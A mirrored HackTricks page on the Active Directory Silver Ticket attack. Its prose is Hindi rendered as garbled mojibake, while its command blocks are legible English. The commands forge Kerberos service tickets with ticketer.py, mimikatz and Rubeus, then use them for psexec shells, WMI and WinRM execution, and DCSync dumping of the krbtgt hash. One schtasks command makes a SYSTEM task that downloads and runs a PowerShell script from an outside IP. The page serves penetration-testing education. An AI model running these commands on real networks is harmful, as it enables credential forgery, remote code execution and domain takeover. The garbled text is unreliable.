Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/silver-ticket.md

13 KiB
Raw Permalink Blame History

Silver Ticket

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Silver ticket

Silver Ticket рд╣рдорд▓рд╛ Active Directory (AD) рд╡рд╛рддрд╛рд╡рд░рдг рдореЗрдВ рд╕реЗрд╡рд╛ рдЯрд┐рдХрдЯреЛрдВ рдХреЗ рд╢реЛрд╖рдг рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рд╣реИред рдпрд╣ рд╡рд┐рдзрд┐ рд╕реЗрд╡рд╛ рдЦрд╛рддреЗ рдХрд╛ NTLM рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдкрд░ рдирд┐рд░реНрднрд░ рдХрд░рддреА рд╣реИ, рдЬреИрд╕реЗ рдХрд┐ рдПрдХ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддрд╛, рддрд╛рдХрд┐ рдПрдХ рдЯрд┐рдХрдЯ рдЧреНрд░рд╛рдВрдЯрд┐рдВрдЧ рд╕реЗрд╡рд╛ (TGS) рдЯрд┐рдХрдЯ рдХреЛ рдЬрд╛рд▓реА рдмрдирд╛рдпрд╛ рдЬрд╛ рд╕рдХреЗред рдЗрд╕ рдЬрд╛рд▓реА рдЯрд┐рдХрдЯ рдХреЗ рд╕рд╛рде, рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рд╡рд┐рд╢рд┐рд╖реНрдЯ рд╕реЗрд╡рд╛рдУрдВ рддрдХ рдкрд╣реБрдБрдЪ рд╕рдХрддрд╛ рд╣реИ, рдХрд┐рд╕реА рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░рддреЗ рд╣реБрдП, рдЖрдорддреМрд░ рдкрд░ рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд▓рд┐рдП рд▓рдХреНрд╖реНрдп рдмрдирд╛рддреЗ рд╣реБрдПред рдпрд╣ рдЬреЛрд░ рджрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ рдХрд┐ рдЯрд┐рдХрдЯреЛрдВ рдХреЛ рдЬрд╛рд▓реА рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП AES рдХреБрдВрдЬрд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдЕрдзрд┐рдХ рд╕реБрд░рдХреНрд╖рд┐рдд рдФрд░ рдХрдо рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдпреЛрдЧреНрдп рд╣реИред

рдЯрд┐рдХрдЯ рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП, рд╡рд┐рднрд┐рдиреНрди рдЙрдкрдХрд░рдгреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдЬреЛ рдСрдкрд░реЗрдЯрд┐рдВрдЧ рд╕рд┐рд╕реНрдЯрдо рдХреЗ рдЖрдзрд╛рд░ рдкрд░ рд╣реЛрддреЗ рд╣реИрдВ:

On Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Windows рдкрд░

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

The CIFS рд╕реЗрд╡рд╛ рдХреЛ рдкреАрдбрд╝рд┐рдд рдХреА рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рд╕рд╛рдорд╛рдиреНрдп рд▓рдХреНрд╖реНрдп рдХреЗ рд░реВрдк рдореЗрдВ рдЙрдЬрд╛рдЧрд░ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рд▓реЗрдХрд┐рди HOST рдФрд░ RPCSS рдЬреИрд╕реА рдЕрдиреНрдп рд╕реЗрд╡рд╛рдУрдВ рдХрд╛ рднреА рдХрд╛рд░реНрдпреЛрдВ рдФрд░ WMI рдкреНрд░рд╢реНрдиреЛрдВ рдХреЗ рд▓рд┐рдП рд╢реЛрд╖рдг рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

рдЙрдкрд▓рдмреНрдз рд╕реЗрд╡рд╛рдПрдБ

рд╕реЗрд╡рд╛ рдкреНрд░рдХрд╛рд░ рд╕реЗрд╡рд╛ рд╕рд┐рд▓реНрд╡рд░ рдЯрд┐рдХрдЯреНрд╕
WMI

HOST

RPCSS
PowerShell рд░рд┐рдореЛрдЯрд┐рдВрдЧ

HOST

HTTP

OS рдХреЗ рдЖрдзрд╛рд░ рдкрд░ рднреА:

WSMAN

RPCSS
WinRM

HOST

HTTP

рдХреБрдЫ рдЕрд╡рд╕рд░реЛрдВ рдкрд░ рдЖрдк рдмрд╕ рдкреВрдЫ рд╕рдХрддреЗ рд╣реИрдВ: WINRM
рдЕрдиреБрд╕реВрдЪрд┐рдд рдХрд╛рд░реНрдп HOST
Windows рдлрд╝рд╛рдЗрд▓ рд╕рд╛рдЭрд╛, рд╕рд╛рде рд╣реА psexec CIFS
LDAP рд╕рдВрдЪрд╛рд▓рди, рдЬрд┐рд╕рдореЗрдВ DCSync рд╢рд╛рдорд┐рд▓ рд╣реИ LDAP
Windows рд░рд┐рдореЛрдЯ рд╕рд░реНрд╡рд░ рдкреНрд░рд╢рд╛рд╕рди рдЙрдкрдХрд░рдг

RPCSS

LDAP

CIFS
рдЧреЛрд▓реНрдбрди рдЯрд┐рдХрдЯреНрд╕ krbtgt

Rubeus рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЖрдк рдЗрди рд╕рднреА рдЯрд┐рдХрдЯреЛрдВ рдХреЗ рд▓рд┐рдП рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

  • /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

рд╕рд┐рд▓реНрд╡рд░ рдЯрд┐рдХрдЯреНрд╕ рдЗрд╡реЗрдВрдЯ рдЖрдИрдбреА

  • 4624: рдЦрд╛рддрд╛ рд▓реЙрдЧрд┐рди
  • 4634: рдЦрд╛рддрд╛ рд▓реЙрдЧрдЖрдЙрдЯ
  • 4672: рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд▓реЙрдЧрд┐рди

рд╕реЗрд╡рд╛ рдЯрд┐рдХрдЯреЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ

рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЙрджрд╛рд╣рд░рдгреЛрдВ рдореЗрдВ рдХрд▓реНрдкрдирд╛ рдХрд░реЗрдВ рдХрд┐ рдЯрд┐рдХрдЯ рдХреЛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЦрд╛рддреЗ рдХрд╛ рдЕрдиреБрдХрд░рдг рдХрд░рддреЗ рд╣реБрдП рдкреБрдирдГ рдкреНрд░рд╛рдкреНрдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред

CIFS

рдЗрд╕ рдЯрд┐рдХрдЯ рдХреЗ рд╕рд╛рде рдЖрдк C$ рдФрд░ ADMIN$ рдлрд╝реЛрд▓реНрдбрд░ рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рд╣реЛрдВрдЧреЗ SMB рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ (рдпрджрд┐ рд╡реЗ рдЙрдЬрд╛рдЧрд░ рд╣реИрдВ) рдФрд░ рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рджреВрд░рд╕реНрде рдлрд╝рд╛рдЗрд▓ рдкреНрд░рдгрд╛рд▓реА рдХреЗ рдПрдХ рднрд╛рдЧ рдореЗрдВ рдХреЙрдкреА рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдмрд╕ рдХреБрдЫ рдРрд╕рд╛ рдХрд░рдХреЗ:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

рдЖрдк рд╣реЛрд╕реНрдЯ рдХреЗ рдЕрдВрджрд░ рдПрдХ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдпрд╛ psexec рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдордирдорд╛рдиреЗ рдЖрджреЗрд╢ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдореЗрдВ рднреА рд╕рдХреНрд╖рдо рд╣реЛрдВрдЧреЗ:

{% content-ref url="../lateral-movement/psexec-and-winexec.md" %} psexec-and-winexec.md {% endcontent-ref %}

HOST

рдЗрд╕ рдЕрдиреБрдорддрд┐ рдХреЗ рд╕рд╛рде рдЖрдк рджреВрд░рд╕реНрде рдХрдВрдкреНрдпреВрдЯрд░реЛрдВ рдореЗрдВ рдЕрдиреБрд╕реВрдЪрд┐рдд рдХрд╛рд░реНрдп рдЙрддреНрдкрдиреНрди рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдордирдорд╛рдиреЗ рдЖрджреЗрд╢ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

HOST + RPCSS

рдЗрди рдЯрд┐рдХрдЯреЛрдВ рдХреЗ рд╕рд╛рде рдЖрдк рд╢рд┐рдХрд╛рд░ рдкреНрд░рдгрд╛рд▓реА рдореЗрдВ WMI рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

wmiexec рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдирдХрд╛рд░реА рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкреГрд╖реНрда рдкрд░ рдЦреЛрдЬреЗрдВ:

{% content-ref url="../lateral-movement/wmiexec.md" %} wmiexec.md {% endcontent-ref %}

HOST + WSMAN (WINRM)

winrm рдПрдХреНрд╕реЗрд╕ рдХреЗ рд╕рд╛рде рдЖрдк рдПрдХ рдХрдВрдкреНрдпреВрдЯрд░ рдХреЛ рдПрдХреНрд╕реЗрд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдпрд╣рд╛рдВ рддрдХ рдХрд┐ рдПрдХ PowerShell рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

Check the following page to learn рдПрдХ рджреВрд░рд╕реНрде рд╣реЛрд╕реНрдЯ рд╕реЗ winrm рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рдЕрдзрд┐рдХ рддрд░реАрдХреЗ:

{% content-ref url="../lateral-movement/winrm.md" %} winrm.md {% endcontent-ref %}

{% hint style="warning" %} рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ winrm рдХреЛ рд╕рдХреНрд░рд┐рдп рдФрд░ рд╕реБрдирдиреЗ рд╡рд╛рд▓рд╛ рд╣реЛрдирд╛ рдЪрд╛рд╣рд┐рдП рджреВрд░рд╕реНрде рдХрдВрдкреНрдпреВрдЯрд░ рдкрд░ рдЗрд╕реЗ рдПрдХреНрд╕реЗрд╕ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдПред {% endhint %}

LDAP

рдЗрд╕ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдХреЗ рд╕рд╛рде рдЖрдк DCSync рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ DC рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЛ рдбрдВрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

DCSync рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рдЬрд╛рдиреЗрдВ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдкреГрд╖реНрда рдкрд░:

рд╕рдВрджрд░реНрдн

{% content-ref url="dcsync.md" %} dcsync.md {% endcontent-ref %}

рдмрдЧ рдмрд╛рдЙрдВрдЯреА рдЯрд┐рдк: рд╕рд╛рдЗрди рдЕрдк рдХрд░реЗрдВ Intigriti рдХреЗ рд▓рд┐рдП, рдПрдХ рдкреНрд░реАрдорд┐рдпрдо рдмрдЧ рдмрд╛рдЙрдВрдЯреА рдкреНрд▓реЗрдЯрдлреЙрд░реНрдо рдЬреЛ рд╣реИрдХрд░реНрд╕ рджреНрд╡рд╛рд░рд╛, рд╣реИрдХрд░реНрд╕ рдХреЗ рд▓рд┐рдП рдмрдирд╛рдпрд╛ рдЧрдпрд╛ рд╣реИ! рдЖрдЬ рд╣реА https://go.intigriti.com/hacktricks рдкрд░ рд╣рдорд╛рд░реЗ рд╕рд╛рде рдЬреБрдбрд╝реЗрдВ, рдФрд░ $100,000 рддрдХ рдХреА рдмрд╛рдЙрдВрдЯреА рдХрдорд╛рдирд╛ рд╢реБрд░реВ рдХрд░реЗрдВ!

{% embed url="https://go.intigriti.com/hacktricks" %}

{% hint style="success" %} AWS рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ:HackTricks Training AWS Red Team Expert (ARTE)
GCP рд╣реИрдХрд┐рдВрдЧ рд╕реАрдЦреЗрдВ рдФрд░ рдЕрднреНрдпрд╛рд╕ рдХрд░реЗрдВ: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ
{% endhint %}